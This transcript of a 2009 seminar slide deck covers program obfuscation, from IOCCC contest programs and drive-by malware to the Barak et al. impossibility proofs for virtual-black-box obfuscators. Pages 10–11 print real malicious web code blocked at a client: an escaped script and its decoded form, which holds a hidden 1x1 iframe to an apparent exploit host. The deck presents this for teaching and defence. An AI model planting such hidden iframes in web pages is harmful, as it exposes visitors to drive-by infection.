Transcript
Page 1: Seminar in Cryptographic Protocols:  Program  Obfuscation

Seminar in Cryptographic Protocols: Program Obfuscation

Omer Singer, June 8, 2009

Page 2: Seminar in Cryptographic Protocols:  Program  Obfuscation

Practical Background

Page 3: Seminar in Cryptographic Protocols:  Program  Obfuscation

What is program obfuscation?

• Obfuscation is deliberately making software code so confusing that even those with access to the code can’t figure out what a program is going to do.

• “The art of making things appear more complicated”

Page 4: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://www.oreillynet.com/pub/a/mac/2005/04/08/code.html

What does this function do?

Page 5: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Three main values:
– Potency
– Resilience
– Cost

• Many methods in use:
– Modify variable names and layout
– Replace integer values with complex equations
– Change program flow
– Modify data structures
– Anti-disassembly (“armored” viruses)
– Anti-debugging

Page 6: Seminar in Cryptographic Protocols:  Program  Obfuscation

And now for some seriously obfuscated programs…

Page 7: Seminar in Cryptographic Protocols:  Program  Obfuscation

Winner of the international C obfuscation contest in 1996

Shows the time on a clock with a configurable face and style

Page 8: Seminar in Cryptographic Protocols:  Program  Obfuscation

Winner of the international C obfuscation contest in 2001

Network-based Pong game

#include <unistd.h> #include <curses.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <sys/time.h> #define o0(M,W) mvprintw(W,M?M-1:M,"%s%s ",M?" ":"",_) #define O0(M,W) M##M=(M+=W##M)-W##M #define l1(M,W) M.tv_##W##sec #define L1(m,M,l,L,o,O) for(L=l;L--;)((char*)(m))[o]=((char*)(M))[O] #define I1 lL,(struct sockaddr*)&il #define i1 COLS #define j LINES #define L_ ((j%2)?j:j-1) fd_set I;struct socka\ ddr_in il;struct host\ ent*LI; struct timeval IL,l;char L[9],_[1<<9] ;void ___(int __ ){_[__--]=+0;if( ++__)___(--__);_ [__]='=';}double o,oo=+0,Oo=+0.2; long O,OO=0,oO=1 ,ii,iI,Ii,Ll,lL, II=sizeof(il),Il ,ll,LL=0,i=0,li, lI;int main(int\ iL,char *Li[]){\ initscr();cbreak ();noecho();nonl ();___(lI=i1/4); _[0]='[';_[lI-1] =']';L1(&il,&_,\ II,O,+O,+lI);il. sin_port=htons(( unsigned long)(\ PORT&0xffff));lL =l_;if(iL=!--iL) {il. sin_addr .\ s_addr=0;bind(I1 ,II);listen(lL,5 );lL=accept(I1,& II);}else{oO-=2; LI=gethostbyname (Li[1]);L1(&(il. sin_addr),(*LI). h_addr_list[0],\ LI->h_length,iI, iI,iI);(*(&il)). 
sin_family=(&(*\ LI))->h_addrtype ;connect(I1,II); }ii=Ii=(o=i1*0.5 )-lI/2;iI=L_-1;O =li=L_*0.5;while (_){mvaddch(+OO, oo,' ');o0(ii,iI );o0(Ii,Il-=Il); mvprintw(li-1,Il ,"%d\n\n%d",i,LL );mvhline(li,+0, '-',i1);mvaddch( O,o,'*');move(li ,Il);refresh();\ timeout(+SPEED); gettimeofday(&IL ,+0);Ll=getch(); timeout(0);while (getch()!=ERR);\ if(Ll=='q'&&iL)\ write(lL,_+1,1); if(ii>(ll=0)&&Ll ==','){write(lL, _,-(--Il));}else if(Ll=='.'&&ii+\ lI<i1){write(lL, _+lI,++Il);}else if(iL||!Il)write (lL,_+lI-1,4-3); gettimeofday(&l, 0);II=((II=l1(IL ,)+(l1(l,u)-=l1( IL,u))-l1(l,)+(\ l1(l,)-=l1(IL,)) )<0)?1+II-l1(l,) +1e6+(--l1(l,)): II;usleep((II+=\ l1(l,)*1e6-SPEED *1e3)<0?-II:+0); if(Ll=='q'&&!iL) break;FD_ZERO(&I );FD_SET(lL,&I); memset(&*&IL,ll, sizeof(l));if((\ Ll=select(lL+1,& I,0,0,&IL)));{if (read(lL,&L,ll+1 )){if(!*L){ll++; }else if(*L==ll[ _]){ll--; }else\ if(*(&(*L))==1[_ ]){break;}}else{ break;}}O0(o,O); O0(O,o);if(o<0){ o*=-1;Oo*=-1;}if (o>i1){o=i1+i1-o ;Oo*=-1;}if(o>=( Ii+=ll)&&O<1&&oO <0&&o<Ii+lI){O=2 ;oO=~--oO;Oo+=ll *4e-1;}if(O<0){O =iI;LL++;}if(o>= (ii+=Il)&&O>iI-1 &&oO>0&&o<ii+lI){O=iI- 2;oO=~--oO;Oo+=Il*4e-1 ;}if(+O>+iI){O-=O;i++; }}endwin();return(0);}

Page 9: Seminar in Cryptographic Protocols:  Program  Obfuscation

No more fun and games…

Page 10: Seminar in Cryptographic Protocols:  Program  Obfuscation

Actual web code blocked by an Intrusion Prevention System at a client:

<Script Language='Javascript'><!--document.write(unescape('%3C%48%54%4D%4C%3E%0A%3C%48%45%41%44%3E%0A%3C%54%49%54%4C%45%3E



//--></Script>

Page 11: Seminar in Cryptographic Protocols:  Program  Obfuscation

When unobfuscated…

<HTML><HEAD><TITLE></TITLE></HEAD><BODY leftmargin=0 topmargin=0 rightmargin=0 bottommargin=0 marginheight=0 marginwidth=0>

<a href="http://www.efsoipaawa.com/ewioqa/"><IMG src="banner2.gif" width="302" height="252" border="0"></a>

<iframe src="http://lxczxo.info/mp/in.php" width="1" height="1" FRAMEBORDER="0" SCROLLING="no"></iframe>

</BODY></HTML>
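The decoding step can be reproduced with a short sketch. It assumes Python's `urllib.parse.unquote` as a stand-in for the JavaScript `unescape` call; for plain `%XX` ASCII escapes the two give the same result. Only the prefix of the escaped string that is visible in the transcript is decoded; the elided remainder is not guessed.

```python
from urllib.parse import unquote

# Prefix of the escaped payload as it appears in the transcript.
# The rest of the string is elided in the source and is left out here.
escaped_prefix = (
    "%3C%48%54%4D%4C%3E%0A"
    "%3C%48%45%41%44%3E%0A"
    "%3C%54%49%54%4C%45%3E"
)

# Each %XX pair is a hexadecimal byte value; decoding yields plain HTML.
decoded = unquote(escaped_prefix)
print(decoded)
```

The output is the opening `<HTML>`, `<HEAD>`, and `<TITLE>` tags, each on its own line. This kind of encoding hides the markup from naive string matching but offers no resistance to anyone who runs the decoder.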

Page 12: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://www.finjan.com/Content.aspx?id=1456

Page 13: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://www.finjan.com/Content.aspx?id=1456

Page 14: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Obfuscation helps attackers bypass antivirus software and delays the response of security researchers

• Obfuscated web code is often the first step in a “drive-by download” attack

• When the browser executes the web code, it launches exploits that target vulnerable local software

• Result is infection of the user’s computer

Page 15: Seminar in Cryptographic Protocols:  Program  Obfuscation
Page 16: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://viruslist.com/en/analysis?pubid=204792056

Page 17: Seminar in Cryptographic Protocols:  Program  Obfuscation

Source: http://viruslist.com/en/analysis?pubid=204792056

Google Search Results Containing a Harmful URL

Page 18: Seminar in Cryptographic Protocols:  Program  Obfuscation

Attempt to calculate impact of obfuscated online attacks:

[1] http://www.itu.int/ITU-D/cyb/cybersecurity/docs/itu-study-financial-aspects-of-malware-and-spam.pdf
[2] http://viruslist.com/en/analysis?pubid=204792056
[3] http://www.securityfocus.com/brief/846

$13.2 billion direct damages of malware [1]

× 74% of malware spread via compromised websites [2]

× 80% of browser-based attacks are now obfuscated [3]

= $7.8 billion

Page 19: Seminar in Cryptographic Protocols:  Program  Obfuscation

Knowing is half the battle…

A few tips to stop obfuscated “drive-by download” attacks

• Use NoScript to block active content on Firefox

• Don’t click on web ads

• Keep client-side software updated: Adobe Reader, Flash Player, Apple Quicktime, etc.

Page 20: Seminar in Cryptographic Protocols:  Program  Obfuscation

Program obfuscation has some positive uses as well!

Page 21: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Preventing source code theft
– Disrupt reverse engineering
– Block code copying
– Especially important with the increased use of Java and .NET languages such as C# and Visual Basic, which compile to intermediate bytecode rather than native machine code and are therefore easier to decompile
– Microsoft recommends obfuscating ASP files in case of server compromise

• Watermarking and Digital Rights Management (DRM)

Page 22: Seminar in Cryptographic Protocols:  Program  Obfuscation

“If obfuscation technology was ever perfected we would have perfect DRM and perfect malware. Yet, that outcome is unlikely. The computer ultimately has to decipher and follow a software program’s true instructions. Each new obfuscation technique has to abide by this requirement and, thus, will be able to be reverse engineered.”

- Chris Wysopal, Good Obfuscation, Bad Code

Page 23: Seminar in Cryptographic Protocols:  Program  Obfuscation

Definitions

Page 24: Seminar in Cryptographic Protocols:  Program  Obfuscation

Oracle Access

• Used by [B+] to facilitate the adversary model
• The oracle is some function f
• The adversary makes a query q to the oracle and receives the answer f(q)
• Useful when studying obfuscation: the oracle serves as an interface to the program without exposing its contents
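Oracle access can be sketched as a wrapper that answers queries without handing over the program. The names `make_oracle`, `secret_program`, and `adversary` are hypothetical. Python closures can in fact be introspected, so this models only the interface, not a real security boundary.

```python
def make_oracle(program):
    """Wrap a program so callers can query it but are not handed its code."""
    query_log = []

    def oracle(q):
        query_log.append(q)   # the oracle receives each query q ...
        return program(q)     # ... and returns only the answer f(q)

    return oracle, query_log


def secret_program(q):
    # Hypothetical program whose internals the adversary should not see.
    return (q * q + 7) % 11


def adversary(oracle):
    """An adversary that learns about f only through input/output pairs."""
    return [oracle(q) for q in range(5)]


oracle, log = make_oracle(secret_program)
answers = adversary(oracle)
print(answers)
```

Everything the adversary knows afterwards is contained in the pairs of queries and answers, which is the sense in which the oracle exposes behavior but not contents.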

Page 25: Seminar in Cryptographic Protocols:  Program  Obfuscation

[Figure: Adversary with Oracle Access. The adversary sends a query q to the oracle, which forwards q to the program and returns the answer f(q) to the adversary.]

Page 26: Seminar in Cryptographic Protocols:  Program  Obfuscation

Virtual Black Box

Anything one can efficiently compute from the obfuscated program (the “virtual black box”), one should be able to efficiently compute given just oracle access to the program.

In other words, for any adversary A there exists a simulator S such that whatever A can learn given an obfuscated program, S can learn from oracle access to that program.

Page 27: Seminar in Cryptographic Protocols:  Program  Obfuscation

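[Figure: a black box receives the query q = “Tell me about yourself” and returns the answer f(q) = “¿Qué quieres saber?” (“What do you want to know?”). From this input/output behavior alone one learns that it speaks Spanish and answers in the form of a question.]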

Page 28: Seminar in Cryptographic Protocols:  Program  Obfuscation

Adversary with access to the virtual black box

Simulator with oracle access to the function

Page 29: Seminar in Cryptographic Protocols:  Program  Obfuscation

Circuit

In the [B+] paper on obfuscation, a circuit plays the role of a Turing machine restricted to inputs of one fixed, finite length.

Page 30: Seminar in Cryptographic Protocols:  Program  Obfuscation

• Circuits are easier to put in a virtual black box.

• Therefore obfuscating circuits is easier than obfuscating TMs.

• Proofs in the [B+] paper first establish theorems for TMs and then extend them to circuits.

Page 31: Seminar in Cryptographic Protocols:  Program  Obfuscation

Obfuscators

• An obfuscator is an algorithm O that will restrict what an adversary can learn about P given O(P).

Page 32: Seminar in Cryptographic Protocols:  Program  Obfuscation

• What is the adversary trying to achieve?
– A program that produces the same output as P
– A program that produces output with some relation to the output of P
– Compute some function of P
– Decide some property of P

• The last goal is the weakest. We want to prove that even preventing this is impossible.

Page 33: Seminar in Cryptographic Protocols:  Program  Obfuscation

General Impossibility Proof

Page 34: Seminar in Cryptographic Protocols:  Program  Obfuscation

TM Obfuscator

A probabilistic algorithm O is a TM obfuscator if the following conditions hold…

Page 35: Seminar in Cryptographic Protocols:  Program  Obfuscation

Functionality:

For every Turing machine M, the string O(M) describes a Turing machine that computes the same function as M.

Page 36: Seminar in Cryptographic Protocols:  Program  Obfuscation

Polynomial slowdown:

The description length and running time of O(M) are at most polynomially larger than those of M

Page 37: Seminar in Cryptographic Protocols:  Program  Obfuscation

“Virtual black box” property:

For any PPT A, there is a PPT S and a negligible function α such that for all TMs M:

$$\left| \Pr[A(O(M)) = 1] - \Pr[S^{M}(1^{|M|}) = 1] \right| \le \alpha(|M|)$$

Page 38: Seminar in Cryptographic Protocols:  Program  Obfuscation

Circuit Obfuscator

• Same idea as TM Obfuscator but intuitively easier since a circuit computes a function with inputs of particular length

• Hence the proposition:

If a TM obfuscator exists, then a circuit obfuscator exists

• Thus if we prove impossibility for circuit obfuscators, impossibility of TM obfuscators follows

Page 39: Seminar in Cryptographic Protocols:  Program  Obfuscation

Unobfuscatable Circuit Ensemble

• A family of circuits such that:
– Every circuit c in the family is efficient
– There exists a predicate π(c) such that
  • π(c) is hard to compute with oracle access to the function that c computes
  • π(c) is easy to compute with access to any circuit c’ that computes the same function as c

Page 40: Seminar in Cryptographic Protocols:  Program  Obfuscation

Main Proof Structure

[B+] structure their proof of the main impossibility result as follows:

1. Define obfuscators that are secure when applied to two programs
2. Show that such obfuscators do not exist
3. Modify the construction to prove that TM/circuit obfuscators do not exist
4. Show how this proof yields an unobfuscatable function ensemble

Page 41: Seminar in Cryptographic Protocols:  Program  Obfuscation
Page 42: Seminar in Cryptographic Protocols:  Program  Obfuscation

2-TM Obfuscator

A 2-TM obfuscator is defined the same as a TM obfuscator but with a strengthened “virtual black box property”: the adversary has access to two obfuscated Turing machines.

Page 43: Seminar in Cryptographic Protocols:  Program  Obfuscation

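• Formal definition of the strengthened “virtual black box” property: for any PPT A, there is a PPT S and a negligible function α such that for all TMs M, N:

$$\left| \Pr[A(O(M), O(N)) = 1] - \Pr[S^{M,N}(1^{|M|+|N|}) = 1] \right| \le \alpha(\min\{|M|, |N|\})$$

The first term is the adversary with access to two obfuscated TMs; the second term is the simulator with oracle access to the two TMs.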

Page 44: Seminar in Cryptographic Protocols:  Program  Obfuscation

Proposition: 2-TM obfuscators do not exist.

According to [B+], “the essence of this proof is that there is a fundamental difference between getting oracle access to a function and getting the program that computes it, no matter how obfuscated”.

Page 45: Seminar in Cryptographic Protocols:  Program  Obfuscation

Proof by contradiction…

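• Suppose that there exists a 2-TM obfuscator O.
• Consider a function that cannot be learned by oracle queries, for example the following Turing machine, defined for $\alpha, \beta \in \{0,1\}^k$:

$$C_{\alpha,\beta}(x) = \begin{cases} \beta & \text{if } x = \alpha \\ 0^k & \text{otherwise} \end{cases}$$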

Page 46: Seminar in Cryptographic Protocols:  Program  Obfuscation

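• Define another Turing machine $D_{\alpha,\beta}$, which takes a program C as input, such that:

$$D_{\alpha,\beta}(C) = \begin{cases} 1 & \text{if } C(\alpha) = \beta \\ 0 & \text{otherwise} \end{cases}$$

• Consider an adversary A such that:

A(C, D) = D(C)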

Page 47: Seminar in Cryptographic Protocols:  Program  Obfuscation

Then for any $\alpha, \beta \in \{0,1\}^k$:

$$\Pr[A(O(C_{\alpha,\beta}), O(D_{\alpha,\beta})) = 1] = 1$$

Page 48: Seminar in Cryptographic Protocols:  Program  Obfuscation

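Therefore S with oracle access to the point function $C_{\alpha,\beta}$ and the tester $D_{\alpha,\beta}$ must output 1, and with oracle access to $Z_k$ (the machine that always outputs $0^k$) and $D_{\alpha,\beta}$ must output 0, each with high probability. But S cannot differentiate between the two cases unless it happens to query the point α, so we have a contradiction.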
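The gap between holding a program and holding an oracle can be sketched in Python. This is an illustration under stated assumptions, not the construction as formalized in [B+]: the obfuscator O is omitted, since by functionality O(C) behaves like C. The parameter `K`, the helper names, and the guessing strategy of the simulator `S` are all hypothetical. Python would let `S` pass its oracle to `D` directly; in the formal model S holds no description of C, so the sketch deliberately avoids doing that.

```python
import random
import secrets

K = 16  # length of alpha and beta in bytes (hypothetical choice)


def make_C(alpha, beta):
    """Point function: outputs beta on input alpha, zeros elsewhere."""
    def C(x):
        return beta if x == alpha else bytes(K)
    return C


def make_D(alpha, beta):
    """Tester: takes a program and checks whether it maps alpha to beta."""
    def D(program):
        return 1 if program(alpha) == beta else 0
    return D


def Z(x):
    """All-zero function: agrees with C everywhere except at alpha."""
    return bytes(K)


def A(C, D):
    """The adversary from the slide: run D on the program C."""
    return D(C)


def S(oracle_C, oracle_D, queries=200, seed=0):
    """Simulator limited to oracle queries: it can only probe guessed
    points of C and feed D programs that it builds itself."""
    rng = random.Random(seed)
    for _ in range(queries):
        a = bytes(rng.getrandbits(8) for _ in range(K))
        b = bytes(rng.getrandbits(8) for _ in range(K))
        if oracle_C(a) != bytes(K):        # found alpha by luck
            return 1
        if oracle_D(make_C(a, b)) == 1:    # guessed (alpha, beta) by luck
            return 1
    return 0


alpha, beta = secrets.token_bytes(K), secrets.token_bytes(K)
C, D = make_C(alpha, beta), make_D(alpha, beta)
print(A(C, D))           # 1 for every alpha, beta
print(A(Z, D))           # 0 unless beta is all zeros
print(S(C, D), S(Z, D))  # S almost never hits alpha, so the two cases look alike
```

The adversary separates the pair (C, D) from the pair (Z, D) with a single call, while the simulator would need to hit one particular point out of 2^128 to notice any difference.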

Page 49: Seminar in Cryptographic Protocols:  Program  Obfuscation

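Combining these equations contradicts the fact that O is a 2-TM obfuscator.

Recall that a 2-TM obfuscator O is defined with the “virtual black box” property that for any PPT A, there is a PPT S and a negligible function α such that for all TMs M, N:

$$\left| \Pr[A(O(M), O(N)) = 1] - \Pr[S^{M,N}(1^{|M|+|N|}) = 1] \right| \le \alpha(\min\{|M|, |N|\})$$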

Page 50: Seminar in Cryptographic Protocols:  Program  Obfuscation

In the [B+] paper, the proof that 2-TM obfuscators do not exist is extended to show that 2-circuit obfuscators also do not exist.

Page 51: Seminar in Cryptographic Protocols:  Program  Obfuscation

TM Obfuscator

• [B+] extend the two-program obfuscation impossibility result to single program obfuscation.

• The extension is based on the ability to combine functions/TMs

Page 52: Seminar in Cryptographic Protocols:  Program  Obfuscation

In [B+] the combination of two functions $f_0, f_1$ is defined as $(f_0 \# f_1)(b, x) = f_b(x)$.

A program C is decomposed into $C_0 \# C_1$ by setting $C_b(x) = C(b, x)$.

By this definition, having oracle access to a combined function $f_0 \# f_1$ is the same as having oracle access to $f_0$ and $f_1$ individually.
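Combination and decomposition can be sketched in a few lines of Python, assuming the combined function maps a selector bit b and an input x to f_b(x) as in [B+]. The helper names `combine` and `decompose` and the two example functions are hypothetical.

```python
def combine(f0, f1):
    """Return f0 # f1, the function (b, x) -> f_b(x)."""
    def combined(b, x):
        return f0(x) if b == 0 else f1(x)
    return combined


def decompose(C):
    """Split a combined program C into (C_0, C_1) with C_b(x) = C(b, x)."""
    def C0(x):
        return C(0, x)

    def C1(x):
        return C(1, x)

    return C0, C1


def double(x):
    return 2 * x


def square(x):
    return x * x


F = combine(double, square)
F0, F1 = decompose(F)
print(F(0, 5), F(1, 5), F0(5), F1(5))
```

Decomposition needs only the ability to fix the first input of the program, which is why an adversary holding a single combined program is as powerful as one holding two separate programs.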

Page 53: Seminar in Cryptographic Protocols:  Program  Obfuscation

Theorem: TM obfuscators do not exist.

The adversary A is the same as before, except that it first decomposes the program C it receives into $C_0$ and $C_1$ and then outputs $C_1(C_0)$.

Page 54: Seminar in Cryptographic Protocols:  Program  Obfuscation

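Suppose for the sake of contradiction that there exists a TM obfuscator O. Apply it to the combined machines $C_{\alpha,\beta} \# D_{\alpha,\beta}$ and $Z_k \# D_{\alpha,\beta}$, where $C_{\alpha,\beta}$ outputs β on input α and $0^k$ elsewhere, $D_{\alpha,\beta}$ tests whether its input program maps α to β, and $Z_k$ always outputs $0^k$. For α, β chosen uniformly at random from $\{0,1\}^k$:

$$\Pr[A(O(C_{\alpha,\beta} \# D_{\alpha,\beta})) = 1] = 1$$

$$\Pr[A(O(Z_k \# D_{\alpha,\beta})) = 1] = 2^{-k}$$

$$\left| \Pr[S^{C_{\alpha,\beta} \# D_{\alpha,\beta}}(1^k) = 1] - \Pr[S^{Z_k \# D_{\alpha,\beta}}(1^k) = 1] \right| \le 2^{-\Omega(k)}$$

These equations contradict the virtual black-box property required for O being a TM obfuscator.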

Page 55: Seminar in Cryptographic Protocols:  Program  Obfuscation

• In [B+] this proof is extended to circuit obfuscators.

• The challenge with extending to circuit obfuscators is greater than expected
– The size of a circuit is greater than its input length, so one circuit cannot simply take another as input
– Adapt the proof using homomorphic encryption properties

Page 56: Seminar in Cryptographic Protocols:  Program  Obfuscation

Unobfuscatable Circuit Ensembles

• The case against obfuscators is further strengthened by proving the existence of unobfuscatable circuit ensembles.

Page 57: Seminar in Cryptographic Protocols:  Program  Obfuscation

The unobfuscatable circuit ensemble is defined as

Reminder:

Page 58: Seminar in Cryptographic Protocols:  Program  Obfuscation

We can now show that given any circuit that computes the same function as , we can reconstruct the latter.

• Since D’ computes the same function as D and , we have

• We can now reconstruct

Page 59: Seminar in Cryptographic Protocols:  Program  Obfuscation

Indistinguishability Obfuscator

• Obfuscation models weaker than the “virtual black box” may still be useful for software protection

• Indistinguishability obfuscator: Obfuscations of equivalent circuits of the same size should be computationally indistinguishable.

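• This weaker model escapes the [B+] impossibility result: [B+] note that (inefficient) indistinguishability obfuscators do exist, and later works have proposed candidate efficient constructions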
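For very small input lengths the indistinguishability requirement can be met inefficiently by mapping every circuit to a canonical form. The sketch below uses the full truth table as that canonical form, which is a simplification chosen for illustration and takes time exponential in the number of inputs. The function names are hypothetical.

```python
from itertools import product


def truth_table_obfuscate(circuit, n):
    """Toy indistinguishability obfuscator for n-bit boolean circuits.

    The output is the full truth table, which depends only on the function
    computed and not on how the circuit was written. Runs in time 2**n.
    """
    return tuple(circuit(*bits) for bits in product((0, 1), repeat=n))


def evaluate(table, *bits):
    """Run the 'obfuscated program' by looking the input up in the table."""
    index = int("".join(map(str, bits)), 2)
    return table[index]


# Two different-looking circuits that compute the same function (XOR).
def xor_a(x, y):
    return (x | y) & ~(x & y) & 1


def xor_b(x, y):
    return (x + y) % 2


table_a = truth_table_obfuscate(xor_a, 2)
table_b = truth_table_obfuscate(xor_b, 2)
print(table_a == table_b)
```

Because equivalent circuits yield identical tables, the two obfuscations are not merely hard to distinguish but equal. The open question is whether anything comparable can be done in polynomial time.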

Page 60: Seminar in Cryptographic Protocols:  Program  Obfuscation

Software Watermarking

We would like to be able to “watermark” a program such that the code will always have a certain identifier that cannot be removed.

Page 61: Seminar in Cryptographic Protocols:  Program  Obfuscation

• A good software watermarking scheme should have the following properties:
– Functionality: The marked program computes the same function as the original program.
– Meaningfulness: Most other programs don’t have this marking.
– Fragility: It is infeasible to remove the mark from the program without (substantially) changing its behavior.

• [B+] sought to formalize the watermarking problem as it relates to obfuscation.

Page 62: Seminar in Cryptographic Protocols:  Program  Obfuscation
Page 63: Seminar in Cryptographic Protocols:  Program  Obfuscation

• [B+] sketch a proof showing that no such watermarking scheme exists.

• For any unobfuscatable program, we know that an adversary will be able to take the obfuscated (marked) program and reconstruct the (unmarked) source code.

Page 64: Seminar in Cryptographic Protocols:  Program  Obfuscation

Conclusion

• [B+] have made progress in formalizing the concept of program obfuscation.

• They have shown that the “virtual black box” paradigm is impossible to satisfy.

• Somewhat strong obfuscation of some programs remains a possibility

Page 65: Seminar in Cryptographic Protocols:  Program  Obfuscation

Final Thoughts

• Program obfuscation has an increasingly important role in the race between hackers and the information security community.

• Additional research is needed to increase the effectiveness of malware detection.

• Significant progress in obfuscation techniques may break the current signature-based detection model.

Page 66: Seminar in Cryptographic Protocols:  Program  Obfuscation

Thanks for listening!